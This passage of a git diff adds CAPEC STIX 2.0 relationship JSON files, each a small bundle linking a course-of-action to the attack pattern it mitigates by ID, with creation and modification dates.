+} \ No newline at end of file diff --git a/capec/relationship/relationship--33e09541-7bdb-409c-87ee-c2d5fac60326.json b/capec/relationship/relationship--33e09541-7bdb-409c-87ee-c2d5fac60326.json new file mode 100644 index 0000000000..00d61be500 --- /dev/null +++ b/capec/relationship/relationship--33e09541-7bdb-409c-87ee-c2d5fac60326.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0327b297-68e9-453c-bab9-6558f673b56a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--33e09541-7bdb-409c-87ee-c2d5fac60326", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--33e853e4-5e1b-4e95-9118-2aa7e26e1508.json b/capec/relationship/relationship--33e853e4-5e1b-4e95-9118-2aa7e26e1508.json new file mode 100644 index 0000000000..39aa0447e5 --- /dev/null +++ b/capec/relationship/relationship--33e853e4-5e1b-4e95-9118-2aa7e26e1508.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--14af51d3-5829-4659-95a6-b3a7f4fc3ccd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--33e853e4-5e1b-4e95-9118-2aa7e26e1508", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415", + "target_ref": "attack-pattern--a86fe7bb-145b-4f60-b878-0b362c7fb9b0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--346d9661-926f-445d-b7e3-e41c8754c75e.json b/capec/relationship/relationship--346d9661-926f-445d-b7e3-e41c8754c75e.json new file mode 100644 index 0000000000..e1a6426602 --- /dev/null +++ b/capec/relationship/relationship--346d9661-926f-445d-b7e3-e41c8754c75e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3e86ced2-3f38-4c8b-8796-f99a24f1f52c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--346d9661-926f-445d-b7e3-e41c8754c75e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b302b0b6-167c-4501-a44c-0e0087f9e946", + "target_ref": "attack-pattern--058622b3-81cb-403b-9169-404832c7afaf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--348aebbc-09b9-4051-a6ed-425b45fe65e6.json b/capec/relationship/relationship--348aebbc-09b9-4051-a6ed-425b45fe65e6.json new file mode 100644 index 0000000000..348d0b28d3 --- /dev/null +++ b/capec/relationship/relationship--348aebbc-09b9-4051-a6ed-425b45fe65e6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b1df2c43-e8a2-49c5-ac70-78e44d684301", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--348aebbc-09b9-4051-a6ed-425b45fe65e6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", + "target_ref": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--34d3d53a-099c-40bd-9bea-48dc6cf18afe.json b/capec/relationship/relationship--34d3d53a-099c-40bd-9bea-48dc6cf18afe.json new file mode 100644 index 0000000000..1b0c35086b --- /dev/null +++ b/capec/relationship/relationship--34d3d53a-099c-40bd-9bea-48dc6cf18afe.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2fbc4e18-259c-4cb3-94e8-f12fbc33f14f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--34d3d53a-099c-40bd-9bea-48dc6cf18afe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3310f341-63e4-40c7-a48c-36fa12037d30", + "target_ref": "attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--34d9a6e1-68cf-469f-a760-bbb6ba77993e.json b/capec/relationship/relationship--34d9a6e1-68cf-469f-a760-bbb6ba77993e.json new file mode 100644 index 0000000000..5e8affdcce --- /dev/null +++ b/capec/relationship/relationship--34d9a6e1-68cf-469f-a760-bbb6ba77993e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ff3cd80e-160f-457a-be79-adfc09a13830", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--34d9a6e1-68cf-469f-a760-bbb6ba77993e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89", + "target_ref": "attack-pattern--d9a4a5c3-d84c-4e4f-81a2-677ca21084dd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--34e6a203-ba0f-4f43-a315-bb3c09f7f158.json b/capec/relationship/relationship--34e6a203-ba0f-4f43-a315-bb3c09f7f158.json new file mode 100644 index 0000000000..77ffa04284 --- /dev/null +++ b/capec/relationship/relationship--34e6a203-ba0f-4f43-a315-bb3c09f7f158.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0722209c-e4bd-46f8-8101-1a28998f74eb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--34e6a203-ba0f-4f43-a315-bb3c09f7f158", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b0b48a10-a129-4478-9f9d-d57d7897b955", + "target_ref": "attack-pattern--bc7b8c08-6c6e-42fd-9c78-be5ed35d8ecb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--352aff2e-6c58-4e38-ab7c-d2f1a2cc9731.json b/capec/relationship/relationship--352aff2e-6c58-4e38-ab7c-d2f1a2cc9731.json new file mode 100644 index 0000000000..5b57b5195c --- /dev/null +++ b/capec/relationship/relationship--352aff2e-6c58-4e38-ab7c-d2f1a2cc9731.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--23734234-06f3-46fa-832c-6edca116d037", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--352aff2e-6c58-4e38-ab7c-d2f1a2cc9731", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3661b9f7-963d-4aaa-a0fd-26866bbfe977", + "target_ref": "attack-pattern--2fe91d88-f255-40f7-aa81-fe02a6af78cf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--35505ab0-f3ec-431e-b6b2-bb34d1beeda8.json b/capec/relationship/relationship--35505ab0-f3ec-431e-b6b2-bb34d1beeda8.json new file mode 100644 index 0000000000..d82022cab8 --- /dev/null +++ b/capec/relationship/relationship--35505ab0-f3ec-431e-b6b2-bb34d1beeda8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c53092cb-38cd-478c-afb5-9049777a83c2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--35505ab0-f3ec-431e-b6b2-bb34d1beeda8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--93cf69c5-a053-4064-a4fd-b12d66215429", + "target_ref": "attack-pattern--b1ff1e07-ccde-4a21-abb3-772e6a3128f3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3580d7ad-9cd2-4f77-b0d0-d53ecad8accd.json b/capec/relationship/relationship--3580d7ad-9cd2-4f77-b0d0-d53ecad8accd.json new file mode 100644 index 0000000000..c7d9969440 --- /dev/null +++ b/capec/relationship/relationship--3580d7ad-9cd2-4f77-b0d0-d53ecad8accd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--52a5f626-17a5-4255-baf5-85876dac43d7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3580d7ad-9cd2-4f77-b0d0-d53ecad8accd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415", + "target_ref": "attack-pattern--f35584bc-105b-4708-aaae-9c35be199577", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--35a67c41-70aa-4d22-86fc-cec38bf33bee.json b/capec/relationship/relationship--35a67c41-70aa-4d22-86fc-cec38bf33bee.json new file mode 100644 index 0000000000..78db50fd4b --- /dev/null +++ b/capec/relationship/relationship--35a67c41-70aa-4d22-86fc-cec38bf33bee.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--48d6492e-8ede-4d68-b26b-b73efd0dd704", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--35a67c41-70aa-4d22-86fc-cec38bf33bee", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "target_ref": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3623d044-a85f-4909-8331-8a31b37f675f.json b/capec/relationship/relationship--3623d044-a85f-4909-8331-8a31b37f675f.json new file mode 100644 index 0000000000..ac3bea5693 --- /dev/null +++ b/capec/relationship/relationship--3623d044-a85f-4909-8331-8a31b37f675f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0b3620ba-689b-448b-bba8-b4ce825fced1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3623d044-a85f-4909-8331-8a31b37f675f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--430d5b07-c34b-41e6-8ca6-ba6b15e2d7bc", + "target_ref": "attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--36642b47-bc5e-4cfd-9c04-15d777f15fda.json b/capec/relationship/relationship--36642b47-bc5e-4cfd-9c04-15d777f15fda.json new file mode 100644 index 0000000000..cdda83babb --- /dev/null +++ b/capec/relationship/relationship--36642b47-bc5e-4cfd-9c04-15d777f15fda.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5565c2d0-0bcd-4d65-a6ee-fc3e3ba509e6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--36642b47-bc5e-4cfd-9c04-15d777f15fda", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f80519c-ae05-4092-9e9c-2fe2fc16071f", + "target_ref": "attack-pattern--59634590-4269-4742-896f-27e5a8f3acc4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3678b827-67b3-4ca6-850c-988363d2598c.json b/capec/relationship/relationship--3678b827-67b3-4ca6-850c-988363d2598c.json new file mode 100644 index 0000000000..0a888a1784 --- /dev/null +++ b/capec/relationship/relationship--3678b827-67b3-4ca6-850c-988363d2598c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c36b03d5-2c8d-4576-a280-6180fb439e70", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3678b827-67b3-4ca6-850c-988363d2598c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cccb5c4-5871-41f4-a89c-e04392838811", + "target_ref": "attack-pattern--65ca02d7-25ef-4ed4-accb-5d7c149868f4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--36bfdede-befc-4cec-ada6-f0a1c5de2e01.json b/capec/relationship/relationship--36bfdede-befc-4cec-ada6-f0a1c5de2e01.json new file mode 100644 index 0000000000..c34f7b0200 --- /dev/null +++ b/capec/relationship/relationship--36bfdede-befc-4cec-ada6-f0a1c5de2e01.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ebf1e057-8114-43c8-97ca-db78c63a089b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--36bfdede-befc-4cec-ada6-f0a1c5de2e01", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf93531f-4e41-46e6-83f2-47dece8e630f", + "target_ref": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--371cbb7c-b04f-45df-a03a-84a6133e7aef.json b/capec/relationship/relationship--371cbb7c-b04f-45df-a03a-84a6133e7aef.json new file mode 100644 index 0000000000..586aa824ff --- /dev/null +++ b/capec/relationship/relationship--371cbb7c-b04f-45df-a03a-84a6133e7aef.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7afcf6e7-01fd-4994-b28b-0ccdbfa59b5c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--371cbb7c-b04f-45df-a03a-84a6133e7aef", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca", + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3725b37e-cb09-4e19-bfd4-673f83aa8632.json b/capec/relationship/relationship--3725b37e-cb09-4e19-bfd4-673f83aa8632.json new file mode 100644 index 0000000000..514f3b6e33 --- /dev/null +++ b/capec/relationship/relationship--3725b37e-cb09-4e19-bfd4-673f83aa8632.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f828d1f8-77ce-43e2-9e2a-3f94cfc21476", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3725b37e-cb09-4e19-bfd4-673f83aa8632", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b0488086-27d5-47fc-bbdb-513ead0387b1", + "target_ref": "attack-pattern--fcbaba82-a505-427a-89f0-0284785340fd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--373af6e0-eeda-4135-b28d-6bf58dd00b72.json b/capec/relationship/relationship--373af6e0-eeda-4135-b28d-6bf58dd00b72.json new file mode 100644 index 0000000000..a9e7016f3c --- /dev/null +++ b/capec/relationship/relationship--373af6e0-eeda-4135-b28d-6bf58dd00b72.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--75950b3f-6849-4f7f-b314-72a61625bde0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--373af6e0-eeda-4135-b28d-6bf58dd00b72", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--be73445d-6303-4867-9786-1fbc879fefad", + "target_ref": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--373b622f-b2bd-4d74-8ae4-3adff948fdab.json b/capec/relationship/relationship--373b622f-b2bd-4d74-8ae4-3adff948fdab.json new file mode 100644 index 0000000000..1f004b4aeb --- /dev/null +++ b/capec/relationship/relationship--373b622f-b2bd-4d74-8ae4-3adff948fdab.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--bf1c46aa-dade-4c24-9f1b-25a8de8af908", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--373b622f-b2bd-4d74-8ae4-3adff948fdab", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c75dfa6d-afe9-465c-a6c3-f907a6000417", + "target_ref": "attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--376bcad4-7b88-4547-891d-6001cb010439.json b/capec/relationship/relationship--376bcad4-7b88-4547-891d-6001cb010439.json new file mode 100644 index 0000000000..ac41b13119 --- /dev/null +++ b/capec/relationship/relationship--376bcad4-7b88-4547-891d-6001cb010439.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--842188c4-db52-4a0e-a82f-20c2ee5b1ada", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--376bcad4-7b88-4547-891d-6001cb010439", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--46cc2cb0-eede-4b3a-99b8-bb4fc1b2bd54", + "target_ref": "attack-pattern--34e6183c-256f-4bb9-8636-794024e28b4f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--37792e34-0aae-41e2-8083-a0840183fe5d.json b/capec/relationship/relationship--37792e34-0aae-41e2-8083-a0840183fe5d.json new file mode 100644 index 0000000000..2ca306bc83 --- /dev/null +++ b/capec/relationship/relationship--37792e34-0aae-41e2-8083-a0840183fe5d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fae1c806-c002-4311-9dcb-a11f864b9e58", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--37792e34-0aae-41e2-8083-a0840183fe5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb62522f-e0fa-456a-b97a-908074721e7f", + "target_ref": "attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--37a4a4d5-c754-4240-b263-f60dc1d87d22.json b/capec/relationship/relationship--37a4a4d5-c754-4240-b263-f60dc1d87d22.json new file mode 100644 index 0000000000..7127ca217a --- /dev/null +++ b/capec/relationship/relationship--37a4a4d5-c754-4240-b263-f60dc1d87d22.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a9b70d9c-cb76-4561-b3a1-27124bff4afa", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--37a4a4d5-c754-4240-b263-f60dc1d87d22", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3a74698d-3c03-4e02-8576-c503ba6b8989", + "target_ref": "attack-pattern--d8b7836a-85a5-43ea-bc79-c6303137f74d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3805a6cc-3536-47fa-91db-037018a0ef61.json b/capec/relationship/relationship--3805a6cc-3536-47fa-91db-037018a0ef61.json new file mode 100644 index 0000000000..1603c5fa6e --- /dev/null +++ b/capec/relationship/relationship--3805a6cc-3536-47fa-91db-037018a0ef61.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5c68f05b-959e-452c-96e6-b9db6dde7c1a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3805a6cc-3536-47fa-91db-037018a0ef61", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--380fdf35-ff22-493d-a810-e049e6b31310.json b/capec/relationship/relationship--380fdf35-ff22-493d-a810-e049e6b31310.json new file mode 100644 index 0000000000..ec1993dedb --- /dev/null +++ b/capec/relationship/relationship--380fdf35-ff22-493d-a810-e049e6b31310.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e66a3da7-c571-4e27-bf38-4587a02d75e8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--380fdf35-ff22-493d-a810-e049e6b31310", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6f4e1572-df35-40cd-bd86-f6ab98fb5009", + "target_ref": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3820337c-7206-4af3-90ba-cf4815079d78.json b/capec/relationship/relationship--3820337c-7206-4af3-90ba-cf4815079d78.json new file mode 100644 index 0000000000..603fae716b --- /dev/null +++ b/capec/relationship/relationship--3820337c-7206-4af3-90ba-cf4815079d78.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--29bcf1c5-0983-4c5a-b3d8-e6d540eb4a7d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3820337c-7206-4af3-90ba-cf4815079d78", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25cbb891-6fa0-4c27-870f-1c8442bf0a22", + "target_ref": "attack-pattern--625e9304-f2d8-4578-80bf-ca8532cb3ac5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--384181bc-f41a-411a-9890-9a1b919f1901.json b/capec/relationship/relationship--384181bc-f41a-411a-9890-9a1b919f1901.json new file mode 100644 index 0000000000..2984b3a349 --- /dev/null +++ b/capec/relationship/relationship--384181bc-f41a-411a-9890-9a1b919f1901.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2b4f8ed1-b964-4c89-88b7-7d75695c58d6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--384181bc-f41a-411a-9890-9a1b919f1901", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8dfa992d-4cf0-49b0-9e30-75e0aa0371fa", + "target_ref": "attack-pattern--2b924641-5ed0-411c-bcfe-02ff55a2ec73", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3843f389-1e7b-4f67-aa6a-72c1471300ac.json b/capec/relationship/relationship--3843f389-1e7b-4f67-aa6a-72c1471300ac.json new file mode 100644 index 0000000000..e6174d70aa --- /dev/null +++ b/capec/relationship/relationship--3843f389-1e7b-4f67-aa6a-72c1471300ac.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7ebc4d5a-b6fa-4637-8f4d-09191161b0af", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3843f389-1e7b-4f67-aa6a-72c1471300ac", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cb528d0-385d-4f5a-91eb-44e1c2b42d08", + "target_ref": "attack-pattern--d4adf927-d379-42f9-9d89-0af5e6aa3f02", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--384f6e68-3547-4a13-9297-533d7b8d9f50.json b/capec/relationship/relationship--384f6e68-3547-4a13-9297-533d7b8d9f50.json new file mode 100644 index 0000000000..cf3b0c72b2 --- /dev/null +++ b/capec/relationship/relationship--384f6e68-3547-4a13-9297-533d7b8d9f50.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a6d2350b-7aff-4b0c-a678-b6434c56acfc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--384f6e68-3547-4a13-9297-533d7b8d9f50", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--efcb3542-d85e-4edb-bc6c-abd9bb30475c", + "target_ref": "attack-pattern--f6c3e4d5-4ba7-44ed-9558-ef7d5daf433d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--38d069d4-4832-41a5-8156-70a3596620bf.json 